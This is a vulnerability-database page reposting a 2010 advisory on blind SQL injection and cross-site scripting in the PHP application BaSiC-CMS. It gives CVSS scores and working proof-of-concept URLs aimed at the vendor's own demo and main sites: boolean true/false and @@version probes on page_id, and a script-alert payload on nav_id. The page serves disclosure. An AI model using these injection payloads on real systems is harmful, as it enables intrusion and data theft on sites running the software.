BaSiC-CMS cross site scripting and blind remote SQL injection

2010.02.14
Credit: Red-D3v1L
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

[?] ~ Note : sEc-r1z CrEw# r0x ! ============================================================================== [?] BaSiC-CMS Script (SQL Blind/XSS) Multiple Remote Vulnerabilities ============================================================================== [?] My home: [ http://sec-r1z.com ] [?] For Ask: [ r-d@passport.com] [?] Script: [ BaSiC-CMS ] [?] Home Scirpt [ http://www.basic-cms.de/ ] [?] Language: [ PHP ] [?] Founder: [ Red-D3v1L ] [?] Gr44tz to: [ sec-r1z# Crew - My L0vE A ] [?] n00bz : [Zombie_KSA g0t 0wn3d hehehe n00b pakbugs zf0 ..] ######################################################################## ===[ Exploit SQL Blind ]=== [&#187;] Exploit : index.php?r=&page_id=[Blind] http://demo.basic-cms.de/pages/index.php?r=&page_id=74%20and%201=1 << this true http://demo.basic-cms.de/pages/index.php?r=&page_id=74%20and%201=0 << this faulse http://demo.basic-cms.de/pages/index.php?r=&page_id=74%20and%20substring%28@@version,1,1%29=4 << this true http://demo.basic-cms.de/pages/index.php?r=&page_id=74%20and%20substring%28@@version,1,1%29=5 << this faulse ===[ Exploit XSS ]=== index.php?&nav_id=[XSS Code] http://www.basic-cms.de/pages/index.php?&nav_id=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E ./Greetz For All my Frindes ============================================================================== #sEc-r1z.com Str1kEz y0u !

References:

http://www.securityfocus.com/bid/38235
http://packetstormsecurity.org/1002-exploits/basiccms-sqlxss.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top